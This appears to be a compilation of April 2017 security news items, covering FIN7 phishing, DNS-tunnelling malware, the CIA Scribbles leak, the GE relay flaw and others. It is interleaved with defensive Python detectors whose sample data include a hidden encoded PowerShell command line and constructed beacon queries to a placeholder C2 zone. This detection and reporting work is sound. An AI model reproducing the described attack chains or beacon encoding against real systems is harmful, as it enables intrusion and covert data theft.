In March 2014, YouTube was banned for several months in Turkey after the site was used to broadcast purported footage of a security meeting on Syria.
In the summer of 2013, severe restrictions were imposed on social media during huge protests against President Recep Tayyip Erdogan, who was prime minister at the time.
Savvy internet users frequently resort to the use of VPNs to get around these bans, though there have been reports that the use of VPNs has also started to be blocked.
The government says such measures are always temporary and needed for national security but critics see them as another restriction on civil liberties under Erdogan.
In November 2016, Turkey imposed restrictions lasting several hours on the messaging service WhatsApp as well as on Twitter, Facebook, YouTube and other sites following the controversial arrests of pro-Kurdish MPs.
Prime Minister Binali Yildirim acknowledged at the time that "from time to time for security reasons we can use such measures.... These are temporary measures. Once the danger is passed, everything returns to normal."
Amid uproar on social media over the latest ban, there was also speculation that the decision may have been prompted by deeply unflattering updates to Erdogan's Wikipedia profile after he won the April 16 referendum on enhancing his powers.
The government insists that the new presidential system -- largely due to come into force in 2019 -- will improve efficiency, but critics fear it will lead to one-man rule.
Video game guides are being abused to spread malware
29.4.2017 SecurityWorld Viruses
Hackers have abused dozens of guides for popular game titles to spread malware. Hundreds of thousands of devices are infected.
Video game guides in the form of apps are being abused to spread malware. Security company Check Point found more than half a million Android users infected in exactly this way. The apps are freely available on the Google Play Store. With them, hackers are able to take control of the phone and then load malicious software or unwanted ads onto it.
Check Point reportedly discovered more than forty such exploitable apps, among them guides to game titles as popular as FIFA or Pokemon Go. The company estimates their downloads at between half a million and almost two million, although it is not clear how many of these downloads actually led to a malware infection.
"It is hard to trace, since the apps themselves contain no malicious code," says Daniel Padon of Check Point.
Google, although it has not officially commented on the problem, according to Padon pulled the affected apps from the store after being notified. In the meantime, however, the company has discovered others that may be just as risky.
Their immediate behaviour after download is already suspicious, though: the apps ask the user for a guarantee that they cannot be deleted.
After installation they then try to contact a control server, as a result of which they become a bot in a botnet, a network of remotely controlled devices. It is then easy to download malicious software onto the device. According to Padon, hackers can then use such an infected device to send out unsolicited advertising, use it as part of a DDoS attack, or "just" spy on the data the phone works with. The growth of mobile botnets is alarming.
"It is a hard-to-stop trend that can have a devastating impact."
This is confirmed by Nikolaos Chrysaidos of Avast: "At present it seems that the hackers behind this threat are only abusing it to make money through advertising. Its functionality is still very basic. But nothing prevents it from becoming much more sophisticated in the future."
Insecure Apps that Open Ports Leave Millions of Smartphones at Risk of Hacking
29.4.2017 thehackernews Mobil
A team of researchers from the University of Michigan discovered that hundreds of applications in Google Play Store have a security hole that could potentially allow hackers to steal data from and even implant malware on millions of Android smartphones.
The University of Michigan team says that the actual issue lies within apps that create open ports — a known problem with computers — on smartphones.
So, this issue has nothing to do with your device's operating system or the handset; instead, the origin of this so-called backdoor lies in insecure coding practices by various app developers.
The team used its custom tool to scan over 100,000 Android applications and found 410 potentially vulnerable applications — many of which have been downloaded between 10 and 50 Million times and at least one app comes pre-installed on Android smartphones.
Before going further, let's first understand exactly what ports do and what the related threats are.
Ports can be either physical or electronic in nature. Physical ports are connection points on your smartphones and computers, such as a USB port used to transfer data between devices.
Electronic ports are those invisible doors that an application or a service use to communicate with other devices or services. For example, File Transfer Protocol (FTP) service by default opens port 21 to transfer files, and you need port 80 opened in order to connect to the Internet.
In other words, an application installed on a device can open an unused port (numbered 1 to 65535), which can be thought of as a virtual door, to exchange data with other devices, be it a smartphone, server, personal computer, or an Internet-connected smart appliance.
Over the years, more and more applications in the market function over the Internet or network, but at the same time, these applications and ports opened by them can be a weak link in your system, which could allow a hacker to breach or take control of your device without your knowledge.
This is exactly what the University of Michigan team has detailed in its research paper [PDF] titled, "Open Doors for Bob and Mallory: Open Port Usage in Android Apps and Security Implications."
According to the researchers, the major issue is with the apps like WiFi File Transfer, which has been installed between 10 million and 50 million times and allows users to connect to a port on their smartphone via Wi-Fi, making it easy to transfer files from a phone to a computer.
But due to insufficient security, this ability of the apps is apparently not limited to merely the smartphone's owner, but also malicious actors.
However, applications like WiFi File Transfer pose fewer threats, as they are designed to work over a local network only, which requires attackers to be connected to the same network as you.
On the other hand, this issue is extremely dangerous in the scenarios where you connect to a public Wi-Fi network or corporate network more often.
To get an initial estimate of the impact of these vulnerabilities, the team performed a port scan on its campus network, and within 2 minutes it found a number of mobile devices potentially using these vulnerable apps.
"They manually confirmed the vulnerabilities for 57 applications, including popular mobile apps with 10 to 50 million downloads from official app marketplaces, and also an app that is pre-installed on a series of devices from one manufacturer," the researchers say.
"The vulnerabilities in these apps are generally inherited from the various usage of the open port, which exposes the unprotected sensitive functionalities of the apps to anyone from anywhere that can reach the open port."
No doubt, an open port is an attack surface, but it should be noted that a port opened by an application cannot be exploited unless a vulnerability exists in the application, such as improper authentication, remote code execution or a buffer overflow flaw.
Besides this, an attacker must have the IP address of the vulnerable device, exposed over the Internet. But getting a list of vulnerable devices is not a big deal today, when anyone can buy a cheap cloud service to scan the whole Internet within a few hours.
However, smartphones connected to the Internet via wireless network behind a router are less impacted by this issue, because in that case, attackers would need to be on the same wireless network as the victim.
To prove its point, the team of researchers has also demonstrated various attacks in a series of videos, posted below:
1. Using an app's open ports to steal photos with on-device malware
2. Stealing photos via a network attack
3. Forcing the device to send an SMS to a premium service
The team says these vulnerabilities can be exploited to cause highly severe damage to users, such as remotely stealing contacts, photos, and even security credentials, and also performing sensitive actions such as malware installation and malicious code execution.
The easiest solution to this issue is to uninstall apps that open insecure ports; putting these applications behind a properly configured firewall would also solve most of the issues.
Expert discovered online data belonging to the trading firm AMP
29.4.2017 securityaffairs CyberCrime
Security expert Chris Vickery reported a data breach at online trading firm AMP that exposed customer credit reports and Social Security numbers.
The popular security expert Chris Vickery has discovered a new data breach affecting the AMP online trading firm, which exposed thousands of files, including credit reports, passport scans, and customer chat logs. This specific incident is notable for the amount of money that passes through AMP's systems.
“I’ve come across several finance-related data breaches within the past few weeks, most recently involving the AMP Futures trading platform.” wrote the expert in a blog post.
“While the exact nature of the leak is nothing new, a third-party IT vendor’s unsecured rsync backup device, the amount of money involved is on the large side. The files indicate that AMP has over $50 million on the books and additionally include the private details of over 10,000 account applicants.”
The data leak discovered by Vickery was caused by a misconfigured backup device managed by a third-party IT vendor; it has now been fixed. Such incidents are unfortunately very common, and Vickery has discovered similar data leaks online before.
AMP is a Chicago-based firm that operates many platforms for online futures trading.
Vickery discovered a 70GB dump exposed on the web containing roughly 97,000 files.
“The portion I downloaded comes to about 70 gigs and represents 97,000 different files. It includes credit reports, passport scans, internal company emails, customer chat logs, and basically everything an identity thief would need in order to mount a serious campaign.” Vickery added. “I was surprised at the number of plaintext customer passwords discussed in the chat logs (by staff and customers alike).”
Vickery explained that AMP representatives were surprised when he reported the data leak.
“The head honcho over at AMP was surprised when I fully explained the situation to him over a phone call. He rightly wondered what AMP was paying its third-party IT company for. If a third party, which specializes in IT, can’t catch this kind of leakage themselves, there is some serious improvement to be done.” Vickery explained.
“AMP’s CEO was relieved to hear that I wasn’t trying to sell him anything or attempting any sort of blackmail or extortion, and I’m thankful he understood that I merely discovered the unsecured data rather than causing it to become unsecured. That’s a distinction many people fail to grasp, especially when their company is potentially in the hot seat.”
Chris Vickery has discovered many other high-profile cases of open databases exposed on the Internet.
In December 2015 the security expert discovered 191 million records belonging to US voters online, in April 2016 he also discovered a 132 GB MongoDB database open online and containing 93.4 million Mexican voter records.
In March 2016, Chris Vickery discovered online the database of the Kinoptic iOS app, which had been abandoned by its developers, with details of over 198,000 users.
In January 2017, the expert discovered online an open Rsync server hosting the personal details for at least 200,000 IndyCar racing fans.
A few days ago, Vickery disclosed a massive data breach at a U.S.-based data warehouse, Schoolzilla, which held personal information on more than a million American students (K-12).
FIN7 group has enhanced its phishing techniques
29.4.2017 securityaffairs Phishing
According to the experts from security firm FireEye, the financially-motivated FIN7 group is changing hacking techniques.
The group has been active since late 2015 and was recently spotted targeting personnel involved with United States Securities and Exchange Commission (SEC) filings at various organizations with a new PowerShell backdoor dubbed POWERSOURCE.
The FIN7 group has adopted new phishing techniques: it is leveraging hidden shortcut files (LNK files) to compromise targets.
Experts from FireEye highlighted that the attacks were launched by the FIN7 group and not the Carbanak Group, as other security experts had suspected.
“FIN7 is a financially-motivated threat group that has been associated with malicious operations dating back to late 2015. FIN7 is referred to by many vendors as “Carbanak Group”, although we do not equate all usage of the CARBANAK backdoor with FIN7.” reads the analysis published by FireEye. “FireEye recently observed a FIN7 spear phishing campaign targeting personnel involved with United States Securities and Exchange Commission (SEC) filings at various organizations.”
Experts from FireEye distinguish the activity associated with the FIN7 group from the activity attributed to CARBANAK.
Security experts discovered a string of fileless malware attacks last month that have been powered by the same hacking framework.
The latest attacks attributed to FIN7 did not use weaponized Microsoft Office macros; the hackers switched to hidden shortcut files (LNK files) as the attack vector to launch "mshta.exe". FIN7 then used the VBScript functionality launched by mshta.exe to compromise the victim's system.
“In a newly-identified campaign, FIN7 modified their phishing techniques to implement unique infection and persistence mechanisms. FIN7 has moved away from weaponized Microsoft Office macros in order to evade detection. This round of FIN7 phishing lures implements hidden shortcut files (LNK files) to initiate the infection and VBScript functionality launched by mshta.exe to infect the victim.” reads the analysis.
The hackers leveraged spear phishing emails carrying malicious DOCX or RTF files, each being a different variant of the same LNK file and VBScript technique.
The DOCX and RTF files attempt to convince the user to double-click included images.
“both the malicious DOCX and RTF attempt to convince the user to double-click on the image in the document” states the analysis.
“In this ongoing campaign, FIN7 is targeting organizations with spear phishing emails containing either a malicious DOCX or RTF file – two versions of the same LNK file and VBScript technique.”
The ongoing campaign targeted large restaurant chains, hospitality, and financial service organizations; the threat actors used phishing messages themed as complaints, catering orders, or resumes. To improve the efficiency of the campaign, the FIN7 hackers also called the targets to make sure they had received the email.
According to the experts, this new phishing scheme is more effective than previous ones.
“Overall, this is a more effective phishing tactic since the malicious content is embedded in the document content rather than packaged in the OLE object. By requiring this unique interaction – double-clicking on the image and clicking the “Open” button in the security warning popup – the phishing lure attempts to evade dynamic detection as many sandboxes are not configured to simulate that specific user action,” state the researchers.
Hackers used a multilayer obfuscated PowerShell script that once launched executes shellcode for a Cobalt Strike stager. The shellcode downloads an additional payload from a specific C&C server using DNS aaa.stage.14919005.www1.proslr3[.]com, if the reply is successful, the PowerShell executes the embedded Cobalt Strike.
The FIN7 group also used the HALFBAKED backdoor in the ongoing attacks.
FireEye researchers examined the shortcut LNK files created by the attackers, which revealed valuable information about the attackers' environment.
One of the LNK files used by hackers in the last campaign revealed some specific information about the attackers, for example, that the hackers likely generated this file on a VirtualBox system with hostname “andy-pc” on March 21, 2017.
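The LNK-to-mshta.exe-to-VBScript chain described above leaves a recognisable parent/child and command-line pattern in process telemetry. The following hunting routine is an added example, not FireEye's code: the process records are constructed, and the Sysmon-style field names are an assumption.

```python
"""Hunt for the mshta.exe-based execution chain in process-creation telemetry.
Added example, not FireEye's code; the records below are constructed and the
Sysmon-style field names are an assumption."""
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the new process
    cmdline: str    # its command line


# Constructed sample telemetry (PIDs and paths invented for the demo).
SAMPLE_EVENTS = [
    ProcEvent(1000, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(900, 1, r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs"),
    # benign: an installer runs a local HTA file
    ProcEvent(2001, 1000, r"C:\Windows\System32\mshta.exe",
              r'mshta.exe "C:\Program Files\Vendor\setup.hta"'),
    # suspicious: mshta launched from the shell with an inline script protocol
    # handler, the way the LNK lure above hands control to VBScript
    ProcEvent(2002, 1000, r"C:\Windows\System32\mshta.exe",
              'mshta.exe vbscript:Execute("<script body omitted>")'),
    # suspicious: that mshta then spawns a hidden, encoded PowerShell
    ProcEvent(2003, 2002,
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -NoP -W Hidden -Enc <base64-placeholder>"),
    # benign: PowerShell launched by a service, not by mshta
    ProcEvent(2004, 900,
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -File C:\scripts\backup.ps1"),
]

INLINE_SCRIPT = re.compile(r"\b(vbscript|javascript):", re.IGNORECASE)
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe"}


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def find_mshta_chains(events: List[ProcEvent]) -> List[Tuple[int, str]]:
    """Return (pid, reason) for each event matching one of two rules:
    1. mshta.exe whose command line carries an inline vbscript:/javascript: URI
    2. a script host (PowerShell, cmd, wscript, cscript) whose parent is mshta.exe
    Rule 1 catches the LNK stage, rule 2 the hand-off to the PowerShell stager."""
    by_pid: Dict[int, ProcEvent] = {e.pid: e for e in events}
    findings = []
    for ev in events:
        name = _basename(ev.image)
        if name == "mshta.exe" and INLINE_SCRIPT.search(ev.cmdline):
            findings.append((ev.pid, "mshta.exe running an inline script URI"))
        parent = by_pid.get(ev.ppid)
        if name in SCRIPT_HOSTS and parent and _basename(parent.image) == "mshta.exe":
            findings.append((ev.pid, f"{name} spawned by mshta.exe (pid {parent.pid})"))
    return findings


if __name__ == "__main__":
    for pid, reason in find_mshta_chains(SAMPLE_EVENTS):
        print(pid, reason)
```

The local-HTA installer and the service-launched PowerShell are deliberately left unflagged, so the two rules together isolate the lure's chain rather than every mshta.exe or powershell.exe start.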
Use of DNS Tunneling for C&C Communications
29.4.2017 Kaspersky Virus
– You are goddamn right.
Network communication is a key function for any malicious program. Yes, there are exceptions, such as cryptors and ransomware Trojans that can do their job just fine without using the Internet. However, they also require their victims to establish contact with the threat actor so they can send the ransom and recover their encrypted data. If we omit these two and have a look at the types of malware that have no communication with a C&C and/or threat actor, all that remains are a few outdated or extinct families of malware (such as Trojan-ArcBomb), or irrelevant, crudely made prankware that usually does nothing more than scare the user with screamers or switch mouse buttons.
Malware has come a long way since the Morris worm, and the authors never stop looking for new ways to maintain communication with their creations. Some create complex, multi-tier authentication and management protocols that can take weeks or even months for analysts to decipher. Others go back to the basics and use IRC servers as a management host – as we saw in the recent case of Mirai and its numerous clones.
Often, virus writers don't even bother to run encryption or mask their communications: instructions and related information are sent in plain text, which comes in handy for a researcher analyzing the bot. This approach is typical of incompetent cybercriminals or even experienced programmers who don't have much experience developing malware.
However, you do get the occasional off-the-wall approaches that don’t fall into either of the above categories. Take, for instance, the case of a Trojan that Kaspersky Lab researchers discovered in mid-March and which establishes a DNS tunnel for communication with the C&C server.
The malicious program in question is detected by Kaspersky Lab products as Backdoor.Win32.Denis. This Trojan enables an intruder to manipulate the file system, run arbitrary commands and run loadable modules.
Encryption
Just like lots of other Trojans before it, Backdoor.Win32.Denis extracts the addresses of the functions it needs to operate from loaded DLLs. However, instead of calculating the checksums of the names in the export table (which is what normally happens), this Trojan simply compares the names of the API calls against a list. The list of API names is encrypted by subtracting 128 from each symbol of the function name.
It should be noted that the bot uses two versions of encryption: for API call names and the strings required for it to operate, it does the subtraction from every byte; for DLLs, it subtracts from every other byte. To load DLLs using their names, LoadLibraryW is used, meaning wide strings are required.
‘Decrypting’ strings in the Trojan
Names of API functions and libraries in encrypted format
It should also be noted that only some of the functions are decrypted like this. In the body of the Trojan, references to extracted functions alternate with references to functions received from the loader.
C&C Communication
The principle behind a DNS tunnel's operation can be summed up as: "If you don't know, ask somebody else". When a DNS server receives a DNS request with a name to be resolved, the server starts looking for it in its database. If the record isn't found, the server forwards the request to the name server responsible for the domain stated in the database.
Let's see how this works when a request arrives with the name Y3VyaW9zaXR5.example.com to be resolved. The DNS server receives this request and first attempts to find the domain extension '.com', then 'example.com', but then it fails to find 'Y3VyaW9zaXR5.example.com' in its database. It then forwards the request to example.com and asks it if such a name is known to it. In response, example.com is expected to return the appropriate IP; however, it can return an arbitrary string, including C&C instructions.
Dump of Backdoor.Win32.Denis traffic
This is what Backdoor.Win32.Denis does. The DNS request is sent first to 8.8.8.8, then forwarded to z.teriava[.]com. Everything that comes before this address is the text of the request sent to the C&C.
Here is the response:
DNS packet received in response to the first request
Obviously, the request sent to the C&C is encoded with Base64. The original request is a sequence of zeros with the result of GetTickCount at the end. The bot subsequently receives its unique ID and uses it for identification at the start of the packet.
The instruction number is sent in the fifth DWORD, if we count from the start of the section highlighted green in the diagram above. Next comes the size of the data received from C&C. The data, packed using zlib, begins immediately after that.
The unpacked C&C response
The first four bytes are the data size. All that comes next is the data, which may vary depending on the type of instruction. In this case, it’s the unique ID of the bot, as mentioned earlier. We should point out that the data in the packet is in big-endian format.
The bot ID (highlighted) is stated at the beginning of each request sent to the C&C
C&C Instructions
Altogether, there are 16 instructions the Trojan can handle, although the number of the last instruction is 20. Most of the instructions concern interaction with the file system of the attacked computer. Also, there are capabilities to gain info about open windows, call an arbitrary API or obtain brief info about the system. Let us look into the last of these in more detail, as this instruction is executed first.
Complete list of C&C instructions
Information about the infected computer, sent to the C&C
As can be seen in the screenshot above, the bot sends the computer name and the user name to the C&C, as well as the info stored in the registry branch Software\INSUFFICIENT\INSUFFICIENT.INI:
Time when that specific instruction was last executed. (If executed for the first time, ‘GetSystemTimeAsFileTime’ is returned, and the variable BounceTime is set, in which the result is written);
UsageCount from the same registry branch.
Information about the operating system and the environment is also sent. This info is obtained with the help of NetWkstaGetInfo.
The data is packed using zlib.
The DNS response prior to Base64 encoding
The fields in the response are as follows (only the section highlighted in red with data and size varies depending on the instruction):
Bot ID;
Size of the previous C&C response;
The third DWORD in the C&C response;
Always equals 1 for a response;
GetTickCount();
Size of data after the specified field;
Size of response;
Actual response.
After the registration stage is complete, the Trojan begins to query the C&C in an infinite loop. When no instructions are sent, the communication looks like a series of empty queries and responses.
Sequence of empty queries sent to the C&C
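The beacon pattern described above (a Base64 label carrying zeros plus a tick count, then a polling loop of near-empty queries under one forwarded-to domain) is visible in resolver logs without decrypting anything. The following detector is an added example, not Kaspersky's code: the log format, the zone name and the exact field layout packed into the label are assumptions made for the demo, since the text only sketches the real bot's layout.

```python
"""Flag DNS-tunnel beacons of the kind Backdoor.Win32.Denis sends: many
distinct, Base64-looking leftmost labels from one client under one zone.
Added example, not Kaspersky's code. The resolver log format, the zone
'c2-zone.example' and the layout packed into the label are assumptions."""
import base64
import binascii
import struct
from collections import defaultdict
from typing import Dict, List, Tuple

C2_ZONE = "c2-zone.example"   # placeholder for the domain the request is forwarded to


def make_label(bot_id: int, tick: int, data: bytes = b"") -> str:
    """Pack a request along the lines the text describes: bot ID first (zero
    before registration), a GetTickCount-style value, then size + data, all
    big-endian, then Base64 without the '=' padding a DNS label cannot carry.
    The field order is an assumption for this demo."""
    raw = struct.pack(">III", bot_id, tick, len(data)) + data
    return base64.b64encode(raw).decode().rstrip("=")


def parse_label(label: str) -> Tuple[int, int, bytes]:
    """Inverse of make_label, for decoding a captured query label by hand."""
    raw = base64.b64decode(label + "=" * (-len(label) % 4), validate=True)
    bot_id, tick, size = struct.unpack(">III", raw[:12])
    return bot_id, tick, raw[12:12 + size]


def build_sample_log() -> List[str]:
    """Constructed resolver log lines: '<epoch> <client_ip> <qname>'."""
    lines = [
        "1493400000 10.0.0.5 www.example.com",
        "1493400000 10.0.0.5 mail.example.com",
        "1493400001 10.0.0.7 cdn.example.net",
    ]
    # registration: no bot ID yet, just zeros and the tick count
    lines.append("1493400002 10.0.0.5 %s.%s" % (make_label(0, 0x0012D687), C2_ZONE))
    # polling loop after registration: "empty" queries that differ only in tick
    for i in range(6):
        label = make_label(0x1F2E3D4C, 0x0012D687 + 5000 * (i + 1))
        lines.append("%d 10.0.0.5 %s.%s" % (1493400003 + i, label, C2_ZONE))
    return lines


def _looks_like_base64(label: str) -> bool:
    """True when the label decodes cleanly as (unpadded) Base64."""
    try:
        base64.b64decode(label + "=" * (-len(label) % 4), validate=True)
        return True
    except (binascii.Error, ValueError):
        return False


def find_tunnel_candidates(log_lines, min_queries=5, min_label_len=12) -> List[Dict]:
    """Group queries by (client, zone) and report groups whose leftmost labels
    are numerous, distinct, long and all Base64-decodable: the shape of a
    beacon loop, not of ordinary hostname lookups."""
    groups: Dict[Tuple[str, str], set] = defaultdict(set)
    for line in log_lines:
        _, client, qname = line.split()
        labels = qname.rstrip(".").split(".")
        if len(labels) < 3:            # nothing in front of the zone to carry data
            continue
        zone = ".".join(labels[-2:])
        groups[(client, zone)].add(labels[0])
    findings = []
    for (client, zone), labels in groups.items():
        mean_len = sum(map(len, labels)) / len(labels)
        if (len(labels) >= min_queries and mean_len >= min_label_len
                and all(_looks_like_base64(lbl) for lbl in labels)):
            findings.append({"client": client, "zone": zone,
                             "distinct_labels": len(labels),
                             "mean_label_len": mean_len})
    return findings


if __name__ == "__main__":
    for hit in find_tunnel_candidates(build_sample_log()):
        print(hit)
```

On real resolver logs, tune `min_queries` and `min_label_len` against known-good zones (CDN and anti-spam lookups also use long labels) before alerting on a match.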
Conclusion
The use of DNS tunneling for communication, as seen in Backdoor.Win32.Denis, is a very rare occurrence, albeit not unique. A similar technique was previously used in some POS Trojans and in some APTs (e.g. Backdoor.Win32.Gulpix in the PlugX family). However, this use of the DNS protocol is new on PCs. We presume this method is likely to become increasingly popular with malware writers. We'll keep an eye on how this method is implemented in malicious programs in future.
MD5
Wikileaks revealed the Scribbles tool used by the CIA to mark documents and track whistleblowers
29.4.2017 securityaffairs BigBrothers
Wikileaks has published a new piece of the Vault 7 leak that details a CIA project codenamed Scribbles (a.k.a. the “Snowden Stopper”).
Scribbles is software allegedly developed to embed 'web beacon' tags into confidential documents with the aim of tracking whistleblowers and foreign spies.
Wikileaks has leaked the Scribbles documentation and its source code. The latest released version of Scribbles (v1.0 RC1) is dated March 1, 2016, which suggests it was in use until at least last year.
According to documents leaked by Wikileaks, Scribbles is “a document-watermarking preprocessing system to embed “Web beacon”-style tags into documents that are likely to be copied by Insiders, Whistleblowers, Journalists or others.”
The Scribbles software was written in the C# programming language and generates a random watermark that is inserted into each document.
“(S//OC/NF) Scribbles (SCRIB) is a document watermarking tool that can be used to batch process a number of documents in a pre-seeded input directory. It generates a random watermark for each document, inserts that watermark into the document, saves all such processed documents in an output directory, and creates a log file which identifies the watermarks inserted into each document.” reads the Scribbles user guide.
Every time the watermarked document is accessed by anyone, it loads an embedded file in the background and creates an entry on the CIA's tracking server. The record for each access of a document contains information about who accessed it, the time stamp and the IP address. In this way, it is possible to track document accesses and any abuses.
Unfortunately for the CIA agents, the Scribbles software only works with Microsoft Office. According to the user manual, the CIA tool was developed for off-line preprocessing of Microsoft Office documents, this means that if the watermarked documents are opened in any other application like OpenOffice or LibreOffice, they may reveal watermarks and URLs to the user.
According to the leaked documents, "the Scribbles document watermarking tool has been successfully tested on…Microsoft Office 2013 (on Windows 8.1 x64), documents from Office versions 97–2016 (Office 95 documents will not work!) [and]…documents that are not locked forms, encrypted, or password-protected."
Another limitation of the software is that watermarks are loaded from a remote server, so the tool should work only when the user accessing the marked documents is connected to the Internet.
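Because the beacon described above only fires when the document reaches out to a remote server, a reviewer can find such documents offline by looking for package relationships that point outside the file. The scanner below is an added example, not the leaked tool's code: the sample .docx is constructed in memory, the beacon URL is a placeholder, and wiring the beacon in as an external image relationship is an assumption about one common mechanism, since the leak does not say which one Scribbles used.

```python
"""Find relationships inside an Office Open XML document that point at a remote
server, the hook a 'web beacon' watermark needs to phone home when the file is
opened. Added example, not the leaked tool's code; the sample .docx is
constructed here and the beacon URL is a placeholder."""
import io
import zipfile
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
REL_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
CT_NS = "http://schemas.openxmlformats.org/package/2006/content-types"


def build_sample_docx(beacon_url: Optional[str]) -> bytes:
    """Constructed minimal .docx. With beacon_url set, the document part carries
    an image relationship whose target is external (TargetMode="External"), so
    a viewer that honours it fetches the URL on open. This mechanism is an
    assumption for the demo, not a statement about the real tool."""
    rels = [f'<Relationship Id="rId1" Type="{REL_TYPE}styles" Target="styles.xml"/>']
    if beacon_url:
        rels.append(f'<Relationship Id="rId2" Type="{REL_TYPE}image" '
                    f'Target="{beacon_url}" TargetMode="External"/>')
    document_xml = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
        '<w:body><w:p><w:r><w:t>Quarterly report (constructed sample)</w:t></w:r></w:p>'
        '</w:body></w:document>'
    )
    rels_xml = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{REL_NS}">' + "".join(rels) + '</Relationships>'
    )
    root_rels = (
        f'<Relationships xmlns="{REL_NS}"><Relationship Id="rId1" '
        f'Type="{REL_TYPE}officeDocument" Target="word/document.xml"/></Relationships>'
    )
    content_types = (
        f'<Types xmlns="{CT_NS}">'
        '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
        '<Default Extension="xml" ContentType="application/xml"/>'
        '<Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>'
        '</Types>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", content_types)
        z.writestr("_rels/.rels", root_rels)
        z.writestr("word/document.xml", document_xml)
        z.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


def find_external_targets(docx_bytes: bytes) -> List[Dict[str, str]]:
    """Walk every *.rels part in the package and report relationships marked
    TargetMode="External". Ordinary hyperlinks are external too, so the
    relationship type is returned to let a reviewer focus on image, oleObject
    or attachedTemplate targets, which load without a click."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal").lower() == "external":
                    hits.append({"part": name,
                                 "id": rel.get("Id", ""),
                                 "type": rel.get("Type", "").rsplit("/", 1)[-1],
                                 "target": rel.get("Target", "")})
    return hits


if __name__ == "__main__":
    sample = build_sample_docx("https://beacon.invalid/PLACEHOLDER-watermark.png")
    for hit in find_external_targets(sample):
        print(hit)
```

The same walk works for .xlsx and .pptx packages, since all three store relationships in `*.rels` parts under the same namespace.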
This is the latest batch of files released by Wikileaks; in chronological order, the organization has leaked:
The Year Zero that revealed CIA hacking exploits for hardware and software.
The Dark Matter dump containing iPhone and Mac hacking exploits.
The Marble batch focused on a framework used by the CIA to hinder the attribution of cyber attacks.
The Grasshopper batch that reveals a framework to customize malware for breaking into Microsoft’s Windows and bypassing antivirus protection.
Severe vulnerability in GE Multilin SR poses a serious threat to Power Grid
28.4.2017 securityaffairs Vulnerability
Security experts discovered a critical vulnerability in GE Multilin SR that poses a serious threat to the power grid worldwide.
A team of researchers from New York University has found a serious vulnerability in some of GE's Multilin SR protection relays that poses a serious threat to the power grid.
The experts will provide further details about the vulnerability at the upcoming Black Hat conference in Las Vegas; below is an excerpt from the abstract published on the conference website.
“Essentially, we completely broke the homebrew encryption algorithm used by these protection and management devices to authenticate users and allow privileged operations,” explained the experts in their abstract. “Knowledge of the passcode enables an attacker to completely pwn the device and disconnect sectors of the power grid at will, locking operators out to prolong the attack.”
The experts will also present a live demo showcasing exploitation of the vulnerability during their talk, anticipating that an attack leveraging the issue would have a significant impact on a nation.
The ICS-CERT published a security advisory on this threat that was tracked as CVE-2017-7095.
An attacker can obtain the password either from the front LCD panel or via Modbus commands and use it to gain unauthorized access to vulnerable products.
“Successful exploitation of this vulnerability may allow a remote attacker to obtain weakly encrypted user passwords, which could be used to gain unauthorized access to affected products.” reads the advisory.
“Cipher text versions of user passwords were created with a non-random initialization vector leaving them susceptible to dictionary attacks. Cipher text of user passwords can be obtained from the front LCD panel of affected products and through issued Modbus commands.”
The following versions of GE Multilin SR relays are affected by the flaw:
750 Feeder Protection Relay, firmware versions prior to Version 7.47,
760 Feeder Protection Relay, firmware versions prior to Version 7.47,
469 Motor Protection Relay, firmware versions prior to Version 5.23,
489 Generator Protection Relay, firmware versions prior to Version 4.06,
745 Transformer Protection Relay, firmware versions prior to Version 5.23, and
369 Motor Protection Relay, all firmware versions.
GE has promptly released firmware updates that fix the vulnerability for most of the above products. The firmware updates for 369 Motor Protection Relays are expected to be released in June.
To mitigate the vulnerability GE recommends that users apply updated firmware versions to affected products, as well as implement the following best practices:
Control access to affected products by keeping devices in a locked and secure environment,
Remove passwords when decommissioning devices,
Monitor and block malicious network activity, and
Implement appropriate network segmentation and place affected devices within the control system network, behind properly configured firewalls. Protection and Control system devices should not be directly connected to the Internet or business networks.
While the recent disruptions to Ukraine’s energy supply have clearly demonstrated that attacks on the power grid are a reality, it’s not uncommon for cybersecurity researchers to exaggerate the impact of their findings. It remains to be seen exactly how easily this flaw can be exploited after more information is made available.
Critical Flaw in GE Protection Relays Exposes Power Grid: Researchers
28.4.2017 securityaffairs Vulnerability
A critical vulnerability that affects some of GE’s protection relays poses a serious threat to the power grid, researchers have claimed. The vendor has started releasing patches for the security hole.
A team of researchers from New York University said they identified a severe flaw in some of GE’s Multilin SR protection relays, which are widely deployed in the energy sector. The experts will detail and demonstrate an exploit at the upcoming Black Hat conference in Las Vegas, but they have shared some information on their findings.
“Essentially, we completely broke the home brew encryption algorithm used by these protection and management devices to authenticate users and allow privileged operations,” the experts wrote in their abstract for the conference. “Knowledge of the passcode enables an attacker to completely pwn the device and disconnect sectors of the power grid at will, locking operators out to prolong the attack.”
In an advisory published on Thursday, ICS-CERT said the remotely exploitable vulnerability, tracked as CVE-2017-7095, is related to the use of non-random initialization vectors when encrypting passwords, which exposes them to dictionary attacks.
